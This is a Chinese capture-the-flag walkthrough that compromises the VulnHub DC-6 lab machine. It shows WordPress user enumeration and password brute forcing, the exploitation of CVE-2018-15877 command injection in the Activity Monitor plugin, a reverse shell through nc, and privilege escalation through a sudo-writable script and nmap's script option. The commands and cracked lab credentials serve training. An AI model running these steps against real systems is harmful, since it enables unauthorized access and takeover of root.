DC-6

靶机介绍

  靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip

环境搭建

  下载之后,解压,使用vmware导入或者virtualbox导入都可以,但注意要保证与你的攻击机在同一网段下,vmware要使用最新版

  kali攻击机:192.168.98.136

靶机渗透

信息收集

扫描主机

arp-scan -l

image

  靶机ip地址为:192.168.98.144

扫描端口

masscan --rate=100000 -p 0-65535 192.168.98.144

image

  80、22端口开放

image

  22端口是ssh服务,80端口开放了一个网站

  访问192.168.98.144发现访问不了,这里需要改下本地的dns

# linux:
vim /etc/hosts
# windows:
C:\Windows\System32\drivers\etc\hosts

image

  爆破一下ssh(爆破未成功)

nmap --script=ssh-brute 192.168.98.144

  ‍

  ‍

  指纹识别​imageWordPress 5.1.1

目录扫描

dirsearch -u http://192.168.98.144 -i 200,300-399,403

image

image

[15:14:23] 403 -  300B  - /.ht_wsr.txt
[15:14:23] 403 -  303B  - /.htaccess.bak1
[15:14:23] 403 -  303B  - /.htaccess.orig
[15:14:23] 403 -  303B  - /.htaccess.save
[15:14:23] 403 -  305B  - /.htaccess.sample
[15:14:23] 403 -  304B  - /.htaccess_extra
[15:14:23] 403 -  303B  - /.htaccess_orig
[15:14:23] 403 -  301B  - /.htaccess_sc
[15:14:23] 403 -  301B  - /.htaccessOLD
[15:14:23] 403 -  302B  - /.htaccessOLD2
[15:14:23] 403 -  301B  - /.htaccessBAK
[15:14:23] 403 -  293B  - /.htm
[15:14:23] 403 -  294B  - /.html
[15:14:23] 403 -  303B  - /.htpasswd_test
[15:14:23] 403 -  299B  - /.htpasswds
[15:14:23] 403 -  300B  - /.httr-oauth
[15:14:25] 403 -  294B  - /.php3
[15:14:25] 403 -  293B  - /.php
[15:15:07] 200 -   18KB - /index.php
[15:15:08] 200 -    7KB - /license.txt
[15:15:23] 200 -    3KB - /readme.html
[15:15:26] 403 -  302B  - /server-status
[15:15:26] 403 -  303B  - /server-status/
[15:15:40] 301 -  319B  - /wp-admin  ->  http://192.168.98.144/wp-admin/
[15:15:40] 200 -    0B  - /wp-config.php
[15:15:40] 302 -    0B  - /wp-admin/  ->  http://wordy/wp-login.php?redirect_to=http%3A%2F%2F192.168.98.144%2Fwp-admin%2F&reauth=1
[15:15:40] 200 -  517B  - /wp-admin/install.php
[15:15:40] 200 -    0B  - /wp-content/
[15:15:40] 301 -  321B  - /wp-content  ->  http://192.168.98.144/wp-content/
[15:15:40] 403 -  327B  - /wp-content/plugins/akismet/akismet.php
[15:15:40] 403 -  325B  - /wp-content/plugins/akismet/admin.php
[15:15:40] 301 -  322B  - /wp-includes  ->  http://192.168.98.144/wp-includes/
[15:15:40] 200 -    4KB - /wp-includes/
[15:15:40] 200 -    0B  - /wp-cron.php
[15:15:41] 200 -    1KB - /wp-login.php
[15:15:41] 302 -    0B  - /wp-signup.php  ->  http://wordy/wp-login.php?action=register

漏洞挖掘

wps扫描用户名

wpscan --url http://wordy --enumerate u

  将用户名保存到 username.txt文件中

image

admin
graham
mark
sarah
jens

  然后有个提示,不看答案的话,几乎做不了这个题
提示地址:https://www.vulnhub.com/entry/dc-6,315/

image

cat /usr/share/wordlists/rockyou.txt | grep k01 > password.txt

  然后进行爆破

wpscan --url http://wordy/ -U username.txt -P password.txt

image

  爆破出来一个账户

Username: mark
Password: helpdesk01

  成功登录后台:http://wordy/wp-admin/

image

  ‍

Activity Monitor(CVE-2018-15877)远程命令执行

  在逛了一圈之后没发现可以写入shell的地方,注意这里有个插件:Activity monitor,这里存在远程命令执行漏洞!

image

  补充:

  • CVE-2018-15877漏洞是一个WordPress 插件Plainview Activity Monitor存在远程命令执行的漏洞。Plainview Activity Monitor 是一款网站用户活动监控插件。远程攻击者可以通过构造的url来诱导wordpress管理员来点击恶意链接最终导致远程命令执行。

  通过在正常命令后加 ‘| ls ’ 来执行我们想要的命令

image

image

  发现只能输入一半进去,应该是开发者限制了输入的字数

  打开F12,找到maxlength,修改为150 或者直接用bp抓包:

  靶机存在nc命令

image

  直接用nc反弹shell:

image

  kali成功监听:

image

ssh登录graham账户

  老规矩先去看看passwd和home目录下有什么敏感文件,在home/mark/stuff/things-to-do.txt​文件下发现了这句话

image

账号:graham
密码:GSo7isUM1D4

  尝试去登录:

image

  成功用ssh登录上账户graham ,但是当我去尝试登录后台时失败了

通过特定权限脚本切换账户

  尝试suid提取,发现没有可利用的

find / -perm -u=s -type f 2>/dev/null

  查看当前用户可执行操作

sudo -l                                  

image

  ​backups.sh​是一个解压的脚本

image

  向其中写入命令然后以 jens账户来执行

echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh

image

  成功切换到 jens 用户

nmap提权

  继续查看可执行命令:

sudo -l

image

  发现可以利用nmap命令提权

  nmap提权有2中方式:

  1. 要求:nmap有s标志位,nmap版本足够老
    nmap老版本支持“interactive.”选项,用户能够通过该选项执行shell命令

    sudo nmap --interactive 即可得到交互式shell
    然后在nmap交互模式下键入!bash,即可得到bash的root权限

    • !bash or !sh
    • whoami
  2.  TF=$(mktemp)echo 'os.execute("/bin/sh")' > $TFsudo nmap --script=$TF
    

  ‍

  第一种无法使用,版本不够老,直接使用第二种,拿到root权限:

image

  由于输入的内容没有显示出来,直接使用python开启一个标准的shell

python -c "import pty;pty.spawn('/bin/bash')"

image

拿下flag

  寻找flag

find / -name *flag*

image

cat /root/theflag.txt

image

  ‍

总结

  1. 熟悉使用wps工具来枚举用户名和爆破密码
  2. Activity Monitor(CVE-2018-15877)远程命令执行漏洞利用
  3. 通过特定权限脚本切换账户
  4. nmap提权

  ‍

  ‍

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/784349.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

自动化测试是什么?为何选择 Apifox 作为自动化测试工具

什么是自动化测试? 自动化测试就是利用专门的软件工具来执行测试用例,并将实际结果与预期结果进行比对的过程。与手动测试相比,自动化测试能够大大提高测试效率,降低人为错误,增加测试覆盖率,同时还能节省大量时间和成本。举个“栗子”,如果你需要反复测试一个有上百个输…

真去送了外卖的程序员,来聊聊他眼中的《逆行人生》丨编码人声

「编码人声」是由「RTE开发者社区」策划的一档播客节目,关注行业发展变革、开发者职涯发展、技术突破以及创业创新,由开发者来分享开发者眼中的工作与生活。我们请来一位真的去体验了送外卖的程序员,请他聊聊他眼中的《逆行人生》。本期节目,我们会围绕这部电影的真实性和一…

redhat8 rhel8 启动grub损坏修复

环境:redhat8.4 RHEL8.4 服务器:华为G560 问题描述:调整了/etc/default/grub文件,重新生成/boot/grub2/grub.cfg导致机器启动失败,直接进入了rescue模式 解决方案: 启动到如下界面 选择c进入grub命令界面 可以使用ls命令去查看驱动器的情况 (hd0) 是第一个硬盘。 (hd0,ms…

Easyadmin的安装流程

应用环境: 1.phpStudy 8.1.1.3 2.WNMP:Windows10 + Nginx1.15.11 + MySql5.7 + PHP7.2.9nts 框架版本: 1.ThinkPHP6.0 2.layui2.9.x 3.Echarts5.51 流程步骤: 1.开启phpStudy 必要环境后,创建本地网站目录 2.将本地目录指向public后,填写好伪静态规则:location / {  …

图片相似度对比SSIM和PHash

选择最准确的图像对比算法取决于你的具体需求和应用场景。不同的算法在不同的场景下表现可能不同。以下是一些常见的图像对比算法及其适用场景: 1. 结构相似性 (Structural Similarity Index, SSIM)描述: SSIM 是一种用来衡量两张图像之间的相似度的指标,它考虑了亮度、对比度…

图论杂题 做题笔记

在这个随笔中,会有笔者的一些做题笔记,包括但不限于图论的思想、解题技巧、代码实现等。在这个随笔中,会有笔者的一些做题笔记,包括但不限于图论的思想、解题技巧、代码实现等。

图论杂题

在这个随笔中,会有笔者的一些做题笔记,包括但不限于图论的思想、解题技巧、代码实现等。在这个随笔中,会有笔者的一些做题笔记,包括但不限于图论的思想、解题技巧、代码实现等。

《DNK210使用指南 -CanMV版 V1.0》

第二十章 machine.I2C类实验 1)实验平台:正点原子DNK210开发板 2)章节摘自【正点原子】DNK210使用指南 - CanMV版 V1.0 3)购买链接:https://detail.tmall.com/item.htm?&id=782801398750 4)全套实验源码+手册+视频下载地址:http://www.openedv.com/docs/boards/k210…

AnolisOS 7.9 静默安装Oacle 11.2.0.4

目录环境准备安装包下载上传安装包创建组和用户创建目录及设置权限编辑用户环境变量编辑资源限制修改内核参数编辑/etc/pam.d/login文件安装依赖包关闭防火墙selinux安装数据库软件准备db_install.rsp响应文件运行runInstaller进行安装创建监听创建数据库准备dbca.rsp响应文件创…

电压电流表设计文档

本工程基于立创开发板的电压电流表训练营,在原项目基础上增加了1.8寸TFT屏幕,ESP32蓝牙芯片,USB接口,3.7V锂电池接口及其充电电流、SD卡接口,W25Q64芯片。摘要 设想设计概述 系统组成及功能说明理论成立,开始实现原理图绘制以及器件选型 软件设计实现中遇到的问题设计问题…

TA实践分享:材质与渲染——植物与风(Unity+UE)

【USparkle专栏】如果你深怀绝技,爱“搞点研究”,乐于分享也博采众长,我们期待你的加入,让智慧的火花碰撞交织,让知识的传递生生不息!一、美术分析下面是风格化和写实两种风格的草地效果,看上去是两种不搭边的美术表现形式,但拆解其背后的美术特征和实现原理二者在我们…

1线性回归

一、概念 线性回归是机器学习中有监督机器学习下的一种算法。 回归问题主要关注的是因变量y(需要预测的值,可以是一个也可以是多个)和一个或多个数值型的自变量x(预测变量)之间的关系。需要预测的值:目标变量(target,y,连续值预测变量)。 影响目标变量的因素:X1..Xn…